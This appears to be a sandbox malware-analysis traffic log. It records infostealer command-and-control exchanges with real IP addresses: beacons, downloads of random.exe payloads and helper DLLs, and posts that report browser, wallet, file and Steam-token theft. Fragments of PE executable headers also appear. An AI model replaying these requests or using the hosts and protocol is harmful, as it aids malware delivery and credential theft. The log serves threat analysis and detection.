Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 03:39:23 GMTContent-Type: application/octet-streamContent-Length: 1955840Last-Modified: Sat, 27 Jul 2024 03:09:26 GMTConnection: keep-aliveETag: "66a464e6-1dd800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 03:39:25 GMTContent-Type: application/octet-streamContent-Length: 1879552Last-Modified: Sat, 27 Jul 2024 03:10:02 GMTConnection: keep-aliveETag: "66a4650a-1cae00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000016001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHIHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="hwid"5897F9A553C62507286958------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="build"sila------ECBGCBGCAFIIECBFIDHI--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="message"browsers------BGDAAKJJDAAKFHJKJKFC--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKFHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="message"plugins------KFCBAEHCAEGDHJKFHJKF--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDAEBGIDBGHIECBGHJDHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="message"fplugins------EGDAEBGIDBGHIECBGHJD--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAKJDAAFBAAKEBAAKFHost: 85.28.47.31Content-Length: 6851Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000017001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAKHost: 85.28.47.31Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFCFHJDBKKFHIEHIDGHost: 85.28.47.31Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="file"------HCFIJKKKKKFCAAAAFBKF--
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="file"------AKJDGIEHCAEHIEBFBKKK--
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1
    Host: 85.28.47.31
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1
    Host: 85.28.47.31
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1
    Host: 85.28.47.31
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1
    Host: 85.28.47.31
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1
    Host: 85.28.47.31
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1
    Host: 85.28.47.31
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKK
    Host: 85.28.47.31
    Content-Length: 1067
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBG
    Host: 85.28.47.31
    Content-Length: 267
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------IECBAFCAAKJDHJKFIEBG
    Content-Disposition: form-data; name="token"

    a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3
    ------IECBAFCAAKJDHJKFIEBG
    Content-Disposition: form-data; name="message"

    wallets
    ------IECBAFCAAKJDHJKFIEBG--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----ECGHCBGCBFHIIDHIJKFB
    Host: 85.28.47.31
    Content-Length: 272
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------ECGHCBGCBFHIIDHIJKFB
    Content-Disposition: form-data; name="token"

    a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3
    ------ECGHCBGCBFHIIDHIJKFB
    Content-Disposition: form-data; name="message"

    ybncbhylepme
    ------ECGHCBGCBFHIIDHIJKFB--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1
    Host: 185.215.113.16
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1
    Host: 185.215.113.16
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBG
    Host: 85.28.47.31
    Content-Length: 363
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------GDGIJECGDGCBKECAKFBG
    Content-Disposition: form-data; name="token"

    a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3
    ------GDGIJECGDGCBKECAKFBG
    Content-Disposition: form-data; name="file_name"

    c3RlYW1fdG9rZW5zLnR4dA==
    ------GDGIJECGDGCBKECAKFBG
    Content-Disposition: form-data; name="file"


    ------GDGIJECGDGCBKECAKFBG--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBG
    Host: 85.28.47.31
    Content-Length: 265
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------IECBAFCAAKJDHJKFIEBG
    Content-Disposition: form-data; name="token"

    a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3
    ------IECBAFCAAKJDHJKFIEBG
    Content-Disposition: form-data; name="message"

    files
    ------IECBAFCAAKJDHJKFIEBG--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BFIJKEBFBFHIJJKEHDHI
    Host: 85.28.47.31
    Content-Length: 272
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------BFIJKEBFBFHIJJKEHDHI
    Content-Disposition: form-data; name="token"

    a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3
    ------BFIJKEBFBFHIJJKEHDHI
    Content-Disposition: form-data; name="message"

    wkkjqaiaxkhb
    ------BFIJKEBFBFHIJJKEHDHI--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
    Host: 85.28.47.31
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGH
    Host: 85.28.47.31
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------BGHIIJDGHCBFIECBKEGH
    Content-Disposition: form-data; name="hwid"

    5897F9A553C62507286958
    ------BGHIIJDGHCBFIECBKEGH
    Content-Disposition: form-data; name="build"

    sila
    ------BGHIIJDGHCBFIECBKEGH--
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
